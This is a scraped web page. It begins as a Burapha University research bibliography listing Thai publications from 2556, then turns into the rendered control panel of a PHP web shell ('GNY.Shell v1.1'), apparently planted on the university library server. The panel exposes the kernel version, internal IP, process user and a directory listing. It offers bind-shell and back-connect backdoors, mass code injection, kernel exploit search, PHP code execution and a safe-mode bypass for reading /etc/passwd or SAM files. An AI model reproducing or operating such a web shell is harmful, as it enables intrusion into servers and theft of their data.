งานวิจัยมหาวิทยาลัยบูรพา

Found 2228 results
Author Keyword Title [ Year(Asc)]
2556
กัญจน์ชญา หงส์เลิศคงสกุล., นิรันดร์ วิฑิตอนันต์., อรรถพล เชยศุภเกตุ., Kanchaya Honglertkongsakul., Nirun Witit-anun., Attapol Choeysuppaket. การเตรียมฟิล์มบางใสนำไฟฟ้าด้วยเทคนิค รีแอคตีฟ แมกนีตรอน สปัตเตอริง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
รุ่งนภา แซ่เอ็ง., อุทัยวรรณ ศิริอ่อน., ศักดิ์เกษม เกษมสุข., Rungnapha Saeeng., Uthaiwan Siriou., Sakkasem Kasemsuk. การเตรียมสารอนุพันธ์ใหม่ของ andrographolide เพื่อใช้ศึกษาฤทธิ์ต้านมะเร็ง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อรรถพล เชยศุภเกตุ., นิรันดร์ วิฑิตอนันต์., กัญจน์ชญา หงส์เลิศคงสกุล., Attapol Choeysuppaket., Nirun Witit-anun., Kanchana Piboon. การเตรียมและศึกษาลักษณะเฉพาะฟิล์มบางนาโนของอลูมิเนียมไนไตรด์ ด้วยวิธีรีแอคตีฟสปัตเตอริง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อำนวยพรสถิตย์. สุพรรณี, Supannee Amnuaypornsathit., กิตติวราวุฒิ. จารุวรรณ, Jaruwan Kittiwarawut., ปทุมานนท์. พลอยชนก, Ploychanok Pathumanont. การเปรียบเทียบประสิทธิภาพการรักษาระหว่างการทำกายภาพบำบัดและการนวดแผนไทยในผู้ป่วยปวดคอระยะกึ่งเฉียบพลันและเรื้อรัง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
อนุกูล บูรณประทีปรัตน์., Anukul Buranapratheprat., อัญญดา มีสุข., Aunyada Meesook. การเปลี่ยนแปลงเชิงเวลาของปริมาณคลอโรฟิลล์-เอบริเวณพื้นผิวทะเลอันดามัน จากการประมวลผลภาพดาวเทียมอะควา โมดิส (Aqua MODIS). วารสารวิทยาศาสตร์บูรพา = Burapha science journal. 2556;18(1)
ธวัชชัย นาอุดม., อนุกูล บูรณประทีปรัตน์., กิตติยา หอมหวน., ประสาร อินทเจริญ., Tawatchai Na-u-dom., Anukul Buranapratheprat., Kittiya Homhual., Prasarn Intacharoen. การเปลี่ยนแปลงเชิงเวลาและพื้นที่ของคุณภาพน้ำทะเลบริเวณอ่าวไทยตอนบนในสองฤดูกาลช่วงปี พ.ศ. 2552. วารสารวิทยาศาสตร์บูรพา 2556;18(2)
รุ่งนภา แซ่เอ็ง., อุทัยวรรณ ศิริอ่อน., จเร จรัสจรูญพงษ์., Rungnapha Saeeng., Uthaiwan Siriou., Jaray Jaratjaroonphong. การเปลี่ยนโครงสร้างของสารสกัดจากสมุนไพรฟ้าทะลายโจรเพื่อศึกษาฤทธิ์ยับยั้งเชื้อโรคปริทันต์. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
กิตติกรชัยชาญ. กฤติน, Krittin Kittikornchaichan. การเพิ่มความรู้เกี่ยวกับการระงับความรู้สึก (วางยาสลบ) โดยให้ข้อมูลก่อนการระงับความรู้สึก (วางยาสลบ) ในรูปแบบวิดีทัศน์ในผู้ป่วยหูหนวกเป็นใบ้. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
กฤษณะ ชินสาร., สุวรรณา รัศมีขวัญ., สุนิสา ริมเจริญ., ภูสิต กุลเกษม., เบญจภรณ์ จันทรกองกุล., สุภาวดี ศรีคำดี., Krisana Chinnasarn., Suwanna Rasmequan., Sunisa Rimcharoen., Pusit Kulkasem., Benchaporn Jantarakongkul., Supawadee Srikamdee. การเรียนรู้รวมแบบลูกผสมสำหรับการประมาณมูลค่าซอฟต์แวร์. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ใจดี. พัชนา, Patchana Jaidee., กุหลาบ รัตนสัจธรรม., Koolarb Rudtanasudjatum., ศิริพร จันทร์ฉาย., Siriporn Chanchay. การแพทย์แผนจีน กับการสาธารณสุขไทย. วารสารสาธารณสุขศาสตร์ = Journal of public health. 2556;8(2)
ศิริอ่อน อุทัยวรรณ, Uthaiwan Siriou., พูลศักดิ์ สหกิจพิจารณ์., เสนาภักดิ์ วราพงษ์. การใช้ ionic liquid เป็นตัวทำละลายและตัวเร่งปฏิกิริยาสำหรับการสังเคราะห์อนุพันธ์ของ C-glycosyl heteroaromatic derivatives. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ปิยฉัตร วัฒนชัย., Piyachat Wattanachai., สุนันทา วงศ์เพียร., ขนิษฐา ผาเจริญ., Sunanta Wongphain., Khanittha Phacharoen. การไพโรไลซิสร่วมระหว่างชีวมวลและขยะพลาสติก. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
สยาม ยิ้มศิริ., Siam Yimsiri. การไหลซึมของน้ำมันเบนซินและน้ำมันก๊าซโซฮอลผ่านชั้นใต้ดินที่ไม่อิ่มตัวด้วยน้ำ. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
โอฬาร ถิ่นบางเตียว., Olarn Thinbangtieo. กำนันเป๊าะไม่ได้เป็นเจ้าพ่อภาคตะวันออก. วารสารการเมือง การบริหาร และกฎหมาย 2556;5(3)
อานนท์ วงษ์แก้ว., Arnon Wongkaew. กำลังและความเหนียวของข้อต่อโครงสร้างเหล็ก ที่ก่อสร้างในประเทศไทยภายใต้แรงแผ่นดินไหว (รายงานฉบับสมบูรณ์ปีที่ 2). ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
นิสากร กรุงไกรเพชร., Nisakorn Krungkraipetch. กินอย่างฉลาด ขยับอย่างกระฉับกระเฉง ลดความเสี่ยงมะเร็ง. วารสารคณะพยาบาลศาสตร์ มหาวิทยาลัยบูรพา = The Journal of Faculty of Nursing Burapha University. 2556;21
นงนุช ตั้งเกริกโอฬาร., Nongnud Tangkrock-olan. กุ้ง กั้ง ปูในระบบนิเวศชายฝั่งทะเล พื้นที่ปกปักพันธุกรรมพืชทางทะเล หมู่เกะแสมสาร จังหวัดชลบุรี. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ทวีชัย สำราญวานิช., Taweechai Sumranwanich. ความคงทนของคอนกรีตเสริมเหล็กภายหลังซ่อมแซมและเผชิญกับการทำลายของเกลือคลอไรด์. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ปัทวี สัตยวงศ์ทิพย์., ชัยณรงค์ ศรีมันตะ., Pattavee Sattayavongtip., Chainarong Srimanta. ความคาดหวังของนิสิตภาควิชาศาสนาและปรัชญาต่อการจัดการเรียนการสอนของภาควิชาศาสนาและปรัชญา มหาวิทยาลัยบูรพา. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
ระวิวรรณ สัมฤทธิ์., Raviwon Sumrit., ขวัญชฎิล พิศาลพงศ์., Kwanchadil Pisalphong. ความต้องการกิจกรรมการพัฒนาบุคลากรตำแหน่งบรรณารักษ์ในห้องสมุดมหาวิทยาลัยของรัฐ. วารสารวิชาการมนุษยศาสตร์และสังคมศาสตร์ มหาวิทยาลัยบูรพา 2556;21(37)
วรรณวิชนี ถนอมชาติ., วิจิตรจรรยา. วรรณภา, Wanvicechanee Tanoamchard., Wannapa Wichitchanya. ความต้องการศึกษาต่อระดับปริญญาโท หลักสูตรวิทยาศาสตร์มหาบัณฑิต สาขาการจัดการทรัพยากรมนุษย์และอุตสาหกรรมสัมพันธ์. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
กิตติวราวุฒิ. จารุวรรณ, Jaruwan Kittiwarawut., อำนวยพรสถิตย์. สุพรรณี, Supannee Amnuaypornsathit. ความน่าเชื่อถือของ "ดัชนีวัดความบกพร่องความสามารถของคอ" ในการประเมินความบกพร่องความสามารถของผู้ป่วยที่มีอาการปวดคอระยะกึ่งเฉียบพลันและเรื้อรัง. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
เกรียงศักดิ์ บุญญา., Kriengsak Boonya. ความปลอดภัยและการป้องกันอุบัติเหตุในงานอุตสาหกรรมเพื่อเตรียมความพร้อมแรงงานสู่ประชาคมอาเซียน (2015). วารสารการศึกษาและพัฒนาสังคม = Journal of education and social developmet 2556;9(2)
ภารดี อนันต์นาวี., Paradee Anannawee. ความพึงพอใจของประชาชนต่อการบริการขององค์การบริหารส่วนตำบลท่ากุ่ม จังหวัดตราด. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.
เจริญวิชญ์ สมพงษ์ธรรม., Charoenwit Sompongtam. ความพึงพอใจของประชาชนต่อการบริการขององค์การบริหารส่วนตำบลบางปิด จังหวัดตราด. ชลบุรี. (Chonburi).: มหาวิทยาลัยบูรพา. (Burapha University).; 2556.

Pages

GNY.Shel! Encoded v1.1 edited B.Y $c0rPi0n
 _____ _  ___   __ _____ _     _ _ 
 / ____| \ | \ \  / // ____| |    | | |
| | __| \| |\ \_/ /| (___ | |__  ___| | |
| | |_ | . ` | \  / \___ \| '_ \ / _ \ | |
| |__| | |\ | | | _ ____) | | | | __/ | |
             \_____|_| \_| |_|(_)_____/|_| |_|\___|_|_| {V1.1 edited by $c0rPi0n}
Apache/2.2.22 (EL). PHP/5.3.8
Kernel: Linux www.lib.buu.ac.th 2.6.18-371.1.2.el5 #1 SMP Tue Oct 22 12:51:53 EDT 2013 x86_64Safe-Mode: OFF (not secure)
uid=48(apache) gid=48(apache) groups=48(apache) Disabled PHP Functions: NONE
cURL: ON
Free 264.05 GB of 389.83 GB (67.73%)Server IP: 10.32.1.15 - Your IP: 54.145.144.101

/var/www/html/www/buuir/research/   drwxrwxr-x
[Home]    [Back]    [Forward]    [Up]    [Refresh]    [Search]    [Buffer]    

[String/Hash Tools]    [Processes]    [Users]    [System Information]    [SQL Manager]    [Reverse IP]    [Kernel Exploit Search]    [Execute PHP Code]    [PHP Info]
    
[PHP Tools]    [Bind Shell Backdoor]    [Back-Connection]    [Mass Code Injection]    [Exploits]    [cPanel Finder]    [RFI/LFI Finder]    [Install IP:Port Proxy]    [Install PHP Proxy]    [Suicide Script]
    
Listing folder (22 files and 8 folders):

Name [asc] Size Modify Owner/Group Perms Action
.. LINK 01.09.2014 14:07:15 500/500 drwxrwxr-x [info] 
. LINK 24.01.2015 12:35:08 500/500 drwxrwxr-x [info] 
[scripts] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[profiles] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[includes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[sites] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[modules] DIR 24.01.2015 12:55:44 500/500 drwxr-xr-x [info] 
[misc] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[themes] DIR 01.02.2012 22:03:14 500/500 drwxr-xr-x [info] 
[under] DIR 03.06.2014 15:19:55 500/500 drwxrwxr-x [info] 
 CHANGELOG.txt 63.49 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 UPGRADE.txt 9.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 robots.txt 1.52 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 index.php 529 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.mysql.txt 1.42 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 xmlrpc.php 417 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.sqlite.txt 1.27 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 web.config 2 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 README.txt 3.41 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction_buuir.jpg 44.98 KB 03.06.2014 15:53:14 500/500 -rw-r--r-- [info] [change] [download] 
 MAINTAINERS.txt 7.77 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 LICENSE.txt 17.67 KB 17.09.2011 21:50:20 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.txt 17.44 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 underconstruction.html 296 B 03.06.2014 15:56:51 500/500 -rw-r--r-- [info] [change] [download] 
 authorize.php 6.45 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .htaccess 5.06 KB 08.03.2013 17:07:32 500/500 -rw-r--r-- [info] [change] [download] 
 cron.php 720 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 update.php 18.88 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 .gitignore 174 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 install.php 688 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 INSTALL.pgsql.txt 1.83 KB 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 
 COPYRIGHT.txt 996 B 01.02.2012 22:03:14 500/500 -rw-r--r-- [info] [change] [download] 

  


Enter:
 
Kernel Info:

Functions
Make Dir
Go Dir


 


[ Read-Only ]


 
Aliases
Make File
Go File


 


[ Read-Only ]


 

PHP Safe-Mode Bypass (Read File)

File:

e.g.: /etc/passwd or C:\WINDOWS\system32\.SAM
PHP Safe-Mode Bypass (Directory Listing)

Dir:

e.g.: /etc/ or C:\

Search
  - regexp 

Upload
 
[ Read-Only ]

.:[ GNY.Shell Encoded v1.1 ! Stand@rd Edition | Generated in: 0.02 ]:.